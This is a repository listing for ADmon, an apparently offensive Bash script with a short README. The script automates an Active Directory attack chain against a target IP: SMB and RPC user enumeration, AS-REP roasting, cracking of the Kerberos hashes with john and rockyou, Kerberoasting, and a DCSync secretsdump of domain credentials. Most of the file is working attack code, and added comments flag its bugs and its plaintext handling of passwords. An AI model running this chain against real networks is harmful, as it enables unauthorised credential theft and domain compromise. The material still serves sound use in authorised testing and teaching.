├── ADmon.sh
├── README.md
└── media
    ├── 1.png
    └── 2.png
/ADmon.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# ADmon: interactive wrapper around crackmapexec, smbclient, rpcclient, john
# and the impacket tools. Target details come from the command line; the
# enumeration phase runs first, and the attack phase only runs when it left
# a users.txt of more than 5 lines behind.
#
# Usage (as printed by the script itself):
#   ./ADmon.sh -i ip [options: -u username -p password -d domain]
#
# Points a reviewer should know before running this:
#   * No `set -e`/`set -u`: a failing tool does not stop the script, and the
#     following steps work on whatever (possibly empty or stale) files the
#     earlier ones left in the current directory.
#   * The password is taken from argv (-p), echoed to the terminal several
#     times below and expanded unquoted into tool command lines, so it is
#     typically visible in the invoking shell's history and in process
#     listings on the host running the script.
#   * All results are plain files in the working directory (dom, domain.txt,
#     smbclient, users.txt, tgt, tgt.hash, tgs.hash, passwordmon.txt,
#     usermon.txt, *.secretDump, ...). Cracked passwords and dumped secrets
#     stay on disk; only some intermediate files are removed.
#   * Almost every expansion ($ip, $password, $item, $word, ...) is unquoted,
#     so values containing spaces or glob characters are word-split.
#color
# ANSI escape fragments used with `echo -e` below.
END="\e[0m"
RED="31"
GREEN="32"
GREENJ="\e[${GREEN}m"
BOLDGREEN="\e[1;${GREEN}m"
BOLDRED="\e[1;${RED}m"
ITALICRED="\e[3;${RED}m"
YELLOW="\033[0;33m"   # defined but not used in this file
Cyan="\e[0;36m"       # defined but not used in this file
white="\e[0;37m"      # defined but not used in this file
#echo "hello digimon you are a great man!"
# Banner. The column alignment of the ASCII art was lost in this copy of the
# file; the text itself is unchanged.
echo -e "
${BOLDGREEN}
** ******* **** **** ******* **** **
**** /**////** /**/** **/** **/////** /**/** /**
**//** /** /**/**//** ** /** ** //**/**//** /**
** //** /** /**/** //*** /**/** /**/** //** /**
**********/** /**/** //* /**/** /**/** //**/**
/**//////**/** ** /** / /**//** ** /** //****
/** /**/******* /** /** //******* /** //***
// // /////// // // /////// // ///

github: 0xDigimon
by Abdelmawla Elamrosy${END}"


# rpcclient commands to run; each result is written to a file of the same name.
words=("srvinfo" "enumdomusers" "querydispinfo")
username=""
domain=""       # from -d, but overwritten below when a domain is parsed out of crackmapexec output
ip=""
password=""
help=""         # set by -h, never read
nopass=""       # set by -N, never read
#printf "Are you have username & and password [Y/n]: "
#read -r d
# NOTE(review): "h:" makes -h require an argument and "N" takes none, so
# `-h` on its own is reported as a missing argument and -N only ever stores
# an empty string. Without a leading ':' in the optstring, getopts prints
# its own diagnostic for an unknown option or a missing argument, puts '?'
# in flag and leaves OPTARG unset, so the ': )' arm is never reached and the
# message below reads "Invalid -".
while getopts u:d:i:p:h:N flag
do
  case "${flag}" in
    u) username=${OPTARG};;
    d) domain=${OPTARG};;
    i) ip=${OPTARG};;
    p) password=${OPTARG};;
    h) help=${OPTARG};;
    N) nopass=${OPTARG};;
    \?) echo "Invalid -$OPTARG">&2
        echo "use -h for help"
        exit 1 ;;
    : ) echo "Missing argument for -$OPTARG use -h for help";;
  esac
done
#
#
#Enumeration
#
#
# Requires -i. crackmapexec output is saved to ./dom and the domain name is
# cut out of it; then a share listing and the rpcclient commands in $words
# are tried with whichever credential combination was supplied. The five
# branches below differ only in how the credential is passed (domain\user or
# user, --password or -N, or a null session) and in their line-count
# thresholds, which vary by hand (-lt 2 / -lt 3, -le 1 / -le 2).
if [[(-n "$ip")]];
then

  echo -e "${BOLDGREEN}Wait 5s and Press Enter${END}"
  crackmapexec smb $ip > dom
  echo -e "${ITALICRED}$ip${END}"
  if [[($(wc -l < dom) -ne 0 )]]
  then
    # Takes the third "("-delimited field of every line of dom, then the text
    # between ':' and ')' — presumably crackmapexec's "(domain:NAME)" field;
    # verify against the installed version. Every line is cut, so domain.txt
    # may contain several lines, some of them blank.
    cat dom | cut -d "(" -f 3 | cut -d ":" -f 2 | cut -d ")" -f 1 > domain.txt
    if [[($(wc -l < domain.txt) -ne 0 )]]
    then
      file="domain.txt"
      # Keeps only the LAST line of domain.txt, replacing any -d value.
      while read -r line; do
        domain=$line
      done <$file
    else
      # "line 65" in the message refers to the cut pipeline above.
      echo -e "${BOLDRED}can't get Domain check on dom file format and edit in line 65${END}"
    fi
  fi
  if [[(-n "$username")]]
  then
    echo -e "${ITALICRED}$username${END}"
    if [[(-n "$domain")]]
    then
      echo -e "${ITALICRED}$domain${END}"
      if [[(-n "$password")]]
      then
        # Prints the password in clear text.
        echo -e "${ITALICRED}$password${END}"
        # Share listing to ./smbclient; fewer than 2 lines counts as nothing found.
        smbclient -L $ip -U "$domain\\$username" --password $password > smbclient
        if [[($(wc -l < smbclient) -lt 2 )]]
        then
          rm smbclient
        else
          echo -e "${BOLDGREEN} try smbclient -L $ip -U "$domain\\$username" --password $password to discover shares files${END}"
        fi
        for item in "${words[@]}"
        do
          # Result of each rpcclient command goes to ./srvinfo, ./enumdomusers, ./querydispinfo.
          rpcclient $ip -U "$domain\\$username" --password $password -c $item > $item
          if [[($(wc -l < $item) -le 1 )]]
          then
            rm $item
          else
            # Always parses ./enumdomusers regardless of which $item this is;
            # on the first (srvinfo) pass that file does not exist yet, so
            # users.txt is created empty and rewritten on a later pass.
            cat enumdomusers | cut -d "[" -f 2 | cut -d "]" -f 1 > users.txt
          fi
        done
      else
        # Same as above but with -N (no password).
        smbclient -L $ip -U "$domain\\$username" -N > smbclient

        if [[($(wc -l < smbclient) -lt 2 )]]
        then
          rm smbclient
        else
          echo -e "${BOLDGREEN}try smbclient -L $ip -U "$domain\\$username" -N to discover shares files${END}"
        fi
        for item in "${words[@]}"
        do
          rpcclient $ip -U "$domain\\$username" -N -c $item > $item

          # Threshold is -le 2 here, -le 1 in the other branches.
          if [[($(wc -l < $item) -le 2 )]]
          then
            rm $item
          else
            cat enumdomusers | cut -d "[" -f 2 | cut -d "]" -f 1 > users.txt
          fi
        done
      fi
    else
      # No domain known: plain username.
      if [[(-n "$password")]]
      then
        smbclient -L $ip -U "$username" --password $password > smbclient
        if [[($(wc -l < smbclient) -lt 2 )]]
        then
          rm smbclient
        else
          echo -e "${BOLDGREEN}try smbclient -L $ip -U "$username" --password $password to discover shares files${END}"
        fi
        for item in "${words[@]}"
        do
          rpcclient $ip -U "$username" --password $password -c $item > $item
          if [[($(wc -l < $item) -le 1 )]]
          then
            rm $item
          else
            cat enumdomusers | cut -d "[" -f 2 | cut -d "]" -f 1 > users.txt
          fi
        done
      else
        smbclient -L $ip -U "$username" -N > smbclient
        # Threshold is -lt 3 here, -lt 2 elsewhere.
        if [[($(wc -l < smbclient) -lt 3 )]]
        then
          rm smbclient
        else
          echo -e "${BOLDGREEN}try smbclient -L $ip -U "$username" -N to discover shares files${END}"
        fi
        for item in "${words[@]}"
        do
          rpcclient $ip -U "$username" -N -c $item > $item
          if [[($(wc -l < $item) -le 1 )]]
          then
            rm $item
          else
            cat enumdomusers | cut -d "[" -f 2 | cut -d "]" -f 1 > users.txt
          fi
        done

      fi
    fi
  else
    # No username: null session. $password (if -p was given without -u) is
    # passed here as a bare extra argument, not via --password — with -N it
    # is presumably ignored, but it still lands on the command line.
    smbclient -L $ip -N $password > smbclient
    if [[($(wc -l < smbclient) -lt 2 )]]
    then
      rm smbclient
    else
      echo -e "${BOLDGREEN}try smbclient -L $ip -N to discover shares files${END}"
    fi
    for item in "${words[@]}"
    do
      rpcclient $ip -U "" -N -c $item > $item
      if [[($(wc -l < $item) -le 1 )]]
      then
        rm $item
      else
        cat enumdomusers | cut -d "[" -f 2 | cut -d "]" -f 1 > users.txt
      fi
    done

  fi

else
  echo -e "\n${BOLDRED}Invalid input, Must have IP${END}"
  echo -e "${BOLDGREEN}Usage ./ADmon.sh -i [options: -u username -p password -d domain] ${END}"
  exit 1;
fi

#
#
#Attacks
#
#
#
#
#
# Gate: users.txt must exist and have more than 5 lines. A users.txt left
# over from an earlier run in the same directory satisfies this too.
if [[(-f users.txt)]]
then
  if [[($(wc -l < users.txt) -gt 5 )]]
  then
    #
    #
    #AS-REP-Roasting
    #
    #
    echo -e "${BOLDGREEN}Start AS-REP-Roasting Attack${END}"
    if [[(-n "$username" && -n "$password" && -n "$domain" && -n "$ip" )]]
    then
      # NPUsers.txt is written here but never read again.
      impacket-GetNPUsers -dc-ip $ip $domain/$username:$password > NPUsers.txt
      impacket-GetNPUsers -dc-ip $ip $domain/$username:$password -request > tgt
    fi
    # Runs over the enumerated users.txt; if $domain is still empty this
    # argument is a bare "/".
    impacket-GetNPUsers -user users.txt -dc-ip $ip $domain/ >> tgt
    # "\$krb5asrep" is the literal prefix "$krb5asrep"; matching lines are
    # the hashes kept in tgt.hash.
    cat tgt | grep "\$krb5asrep" > tgt.hash
    #
    #
    # Single-key prompt; anything other than A/a takes the rockyou path.
    read -p $'\e[32mStart crack tgt hash Attack\nDo you want continue using rockyou wordlist or add other wordlist [[R]ockyou/[A]dd] \e[0m' -n 1;
    echo
    if [[($REPLY =~ ^[Aa]$)]]
    #
    #
    then
      printf '\e[1;34m%-6s\e[m' "Add path of word list "
      read -r word
      #word="/usr/share/wordlists/rockyou.txt"
      # Existence check via `ls $word | wc -l`; $word is unquoted, so a path
      # containing spaces or glob characters is split/expanded before ls sees it.
      if [[(`ls -1 $word 2>/dev/null | wc -l ` -gt 0 )]]
      then
        # The parsing below assumes john prints cracked lines as
        # "<password> ($krb5asrep$23$user@REALM)": field 1 (space-separated)
        # is the password, field 4 ('$'-separated) up to '@' the user —
        # TODO confirm against the installed john version. passwordmon.txt
        # and usermon.txt are line-aligned and hold clear-text passwords.
        john --wordlist=$word tgt.hash > pass.txt
        cat pass.txt | grep "\$k" > tgtpassords.txt
        cat tgtpassords.txt | sort -u > tgtpasswords.txt
        rm tgt pass.txt tgtpassords.txt
        cat tgtpasswords.txt | cut -d " " -f 1 > passwordmon.txt
        cat tgtpasswords.txt | cut -d "$" -f 4 | cut -d "@" -f 1 > usermon.txt
      else
        # Fallback to the default wordlist path (same parsing as above).
        echo -e "${BOLDRED}Path not Found Start crack with rockyou${END}"
        word=/usr/share/wordlists/rockyou.txt
        if [[(`ls -1 $word 2>/dev/null | wc -l ` -gt 0 )]]
        then
          john --wordlist=$word tgt.hash > pass.txt
          cat pass.txt | grep "\$k" > tgtpassords.txt
          cat tgtpassords.txt | sort -u > tgtpasswords.txt
          rm tgt pass.txt tgtpassords.txt
          cat tgtpasswords.txt | cut -d " " -f 1 > passwordmon.txt
          cat tgtpasswords.txt | cut -d "$" -f 4 | cut -d "@" -f 1 > usermon.txt
        else
          echo -e "\n${BOLDRED}rockyou not Found${END}"
        fi
      fi
    else
      # Default wordlist path (same parsing as above).
      word=/usr/share/wordlists/rockyou.txt
      if [[(`ls -1 $word 2>/dev/null | wc -l ` -gt 0 )]]
      then
        john --wordlist=$word tgt.hash > pass.txt
        cat pass.txt | grep "\$k" > tgtpassords.txt
        cat tgtpassords.txt | sort -u > tgtpasswords.txt
        rm tgt pass.txt tgtpassords.txt
        cat tgtpasswords.txt | cut -d " " -f 1 > passwordmon.txt
        cat tgtpasswords.txt | cut -d "$" -f 4 | cut -d "@" -f 1 > usermon.txt
      else
        echo -e "\n${BOLDRED}rockyou not Found${END}"
      fi
    fi

    # If no wordlist was found, passwordmon.txt/usermon.txt were never
    # created: the redirections fail, wc prints nothing and [[ sees an empty
    # operand, so this test errors instead of matching.
    if [[($(wc -l < passwordmon.txt) -le 1 && $(wc -l < usermon.txt) -le 1)]]
    then
      echo -e "${BOLDRED}Failed AS-REP-Roasting Attack${END}"
      # tgt.hash is deliberately left in place (see the message below).
      rm usermon.txt passwordmon.txt tgtpasswords.txt
      echo -e "${BOLDRED}maybe it's Failed to crack tgt hash!\nTry to crack the tgt.hash manually${END}"
    fi
    #
    #
    #
    #Start Kerberoasting Attack
    #
    #
    #
    echo -e "${BOLDGREEN}Start Kerberoasting Attack${END}"
    #
    #from user input
    #
    # Only this path passes -request, so tgs.hash exists only when full
    # credentials were supplied on the command line.
    if [[(-n "$username" && -n "$password" && -n "$domain" && -n "$ip" )]]
    then
      echo -e "${GREENJ}username:$username${END}"
      # Prints the password in clear text.
      echo -e "${GREENJ}password:$password${END}"
      impacket-GetUserSPNs $domain/$username:$password -dc-ip $ip > SPNUsers
      impacket-GetUserSPNs $domain/$username:$password -dc-ip $ip -request > tgs.hash

    fi

    #
    #from files
    #
    if [[(-f passwordmon.txt && -f usermon.txt)]]
    then
      # $1 = user, $2 = password (both printed in clear text); SPN listing is
      # appended to ./SPNUsers, without -request.
      two_lines_operation ()
      {
        echo -e "${GREENJ}username:${1}${END}"
        echo -e "${GREENJ}password:${2}${END}"
        impacket-GetUserSPNs $domain/${1}:${2} -dc-ip $ip >> SPNUsers
      }
      # Pairs line N of usermon.txt with line N of passwordmon.txt by
      # re-reading passwordmon.txt once per user and counting with expr.
      # `read` without -r/IFS= trims whitespace and interprets backslashes
      # in both the user and the password.
      countA=0
      while read user
      do
        countB=0
        while read pass
        do
          if [ "$countA" -eq "$countB" ]
          then
            two_lines_operation "$user" "$pass"
            break
          fi
          countB=`expr $countB + 1`
        done < passwordmon.txt
        countA=`expr $countA + 1`
      done < usermon.txt
    fi
    # Runs unconditionally: if neither path above created ./SPNUsers, cat
    # fails, SPNUsers.txt is created empty and the rm reports an error.
    cat SPNUsers| grep "/" |sort -u > SPNUsers.txt
    rm SPNUsers
    if [[($(wc -l < SPNUsers.txt) -ge 1)]]
    then
      echo -e "${BOLDGREEN}try to get tgs hash\nimpacket-GetUserSPNs -dc-ip ip -request${END}"
    else
      echo -e "${BOLDRED}Failed Kerberoasting Attack${END}"
      rm SPNUsers.txt
    fi



    # dc-sync (secretsdump) phase. Two near-identical branches: one when the
    # cracked lists exist, one when only command-line credentials exist.
    if [[(-f passwordmon.txt && -f usermon.txt)]]
    then
      # Either both cracked lists are longer than 2 lines, or full
      # credentials were given on the command line.
      if [[($(wc -l < passwordmon.txt) -gt 2 && $(wc -l < usermon.txt) -gt 2)||(-n "$username" && -n "$password" && -n "$domain" && -n "$ip")]]
      then
        #printf "do you want try dc-sync attack [N/y]: "
        #read dc
        #
        #
        #start dc sync attack
        #
        #
        #

        # Single-key prompt; only Y/y continues.
        read -p $'\e[31mDo you try dc-sync attack (secret dump)? (N/y)\e[0m ' -n 1;
        echo

        if [[($REPLY =~ ^[Yy]$)]]
        then
          if [[(-n "$username" && -n "$password" && -n "$domain" && -n "$ip" )]]
          then
            echo -e "${GREENJ}username:$username${END}"
            # Prints the password in clear text.
            echo -e "${GREENJ}password:$password${END}"
            # Full secretsdump output (domain credential material) is written
            # to ./<username>.secretDump and left on disk unless it is 10
            # lines or shorter, which is treated as failure.
            impacket-secretsdump $domain/$username:$password@$ip > $username.secretDump
            if [[($(wc -l < $username.secretDump) -le 10)]]
            then
              rm $username.secretDump
            fi
          fi
          # Redefines two_lines_operation (same name as the Kerberoasting
          # helper above) to run secretsdump for $1 = user, $2 = password.
          two_lines_operation ()
          {
            echo -e "${GREENJ}username:${1}${END}"
            echo -e "${GREENJ}password:${2}${END}"
            impacket-secretsdump $domain/${1}:${2}@$ip >${1}.secretDump
            if [[($(wc -l < ${1}.secretDump) -le 10)]]
            then
              rm ${1}.secretDump
            fi

          }
          # Same line-pairing loop as in the Kerberoasting phase.
          countA=0
          while read name
          do
            countB=0
            while read pas
            do
              if [ "$countA" -eq "$countB" ]
              then
                two_lines_operation "$name" "$pas"
                break
              fi
              countB=`expr $countB + 1`
            done < passwordmon.txt
            countA=`expr $countA + 1`
          done < usermon.txt
          echo -e "${BOLDRED}Bye!\n0xDIGIMON${END}"
          rm usermon.txt passwordmon.txt
        else
          # Operator declined: lists are removed and the script exits
          # non-zero.
          echo -e "${BOLDRED}Bye!\n0xDIGIMON${END}"
          rm usermon.txt passwordmon.txt
          exit 1;
        fi
        # Any *.secretDump in the working directory counts as success,
        # including files left by earlier runs.
        if [[(`ls -1 *.secretDump 2>/dev/null | wc -l ` -gt 0 )]]
        then
          #echo -e "${BOLDRED}Bye!\n0xDIGIMON${END}"
          echo
        else
          # (message text has a typo: "Feild")
          echo -e "${BOLDRED}Feild dc-sync Attack${END}"
          echo -e "${BOLDRED}Bye!\n0xDIGIMON${END}"
        fi
      fi
    else
      # No cracked lists: only the command-line credentials can be used.
      if [[(-n "$username" && -n "$password" && -n "$domain" && -n "$ip")]]
      then
        #printf "do you want try dc-sync attack [N/y]: "
        #read dc
        #
        #
        #start dc sync attack
        #
        #
        #

        read -p $'\e[31mDo you try dc-sync attack (secret dump)? (N/y)\e[0m ' -n 1;
        echo

        if [[($REPLY =~ ^[Yy]$)]]
        then
          # Same condition as the enclosing if; always true here.
          if [[(-n "$username" && -n "$password" && -n "$domain" && -n "$ip" )]]
          then
            echo -e "${GREENJ}username:$username${END}"
            # Prints the password in clear text.
            echo -e "${GREENJ}password:$password${END}"
            # Output to ./<username>.secretDump; 10 lines or fewer is treated
            # as failure and removed, anything larger stays on disk.
            impacket-secretsdump $domain/$username:$password@$ip > $username.secretDump
            if [[($(wc -l < $username.secretDump) -le 10)]]
            then
              rm $username.secretDump
              echo -e "${BOLDRED}Failed dc-sync Attack${END}"
            fi
          fi
          # Exits non-zero on both the success and the decline path.
          echo -e "${BOLDRED}Bye!\n0xDIGIMON${END}"
          exit 1;
        else
          echo -e "${BOLDRED}Bye!\n0xDIGIMON${END}"
          exit 1;
        fi
      fi
    fi
  fi
fi
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# ADmon
Script to do some enumeration to get initial access
## Usage
4 | ```./ADmon.sh -i [options: -u username -p password -d domain]```
5 | Video-1
Video-1
6 | 7 |
### What you can do
It depends on your input, but you can do:
- Get Domain
- User Enumeration
- Start AS-REP Roasting Attack
- Start Kerberoasting Attack
- Start Dc-sync Attack

I used some tools like smbclient, crackmapexec, rpcclient and the impacket tools.
18 | ##### Thanks for Support 19 |
20 | -------------------------------------------------------------------------------- /media/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xDigimon/ADmon/9190804f6cdfd379a06b318c05b8aeabfc0aa2cd/media/1.png -------------------------------------------------------------------------------- /media/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xDigimon/ADmon/9190804f6cdfd379a06b318c05b8aeabfc0aa2cd/media/2.png --------------------------------------------------------------------------------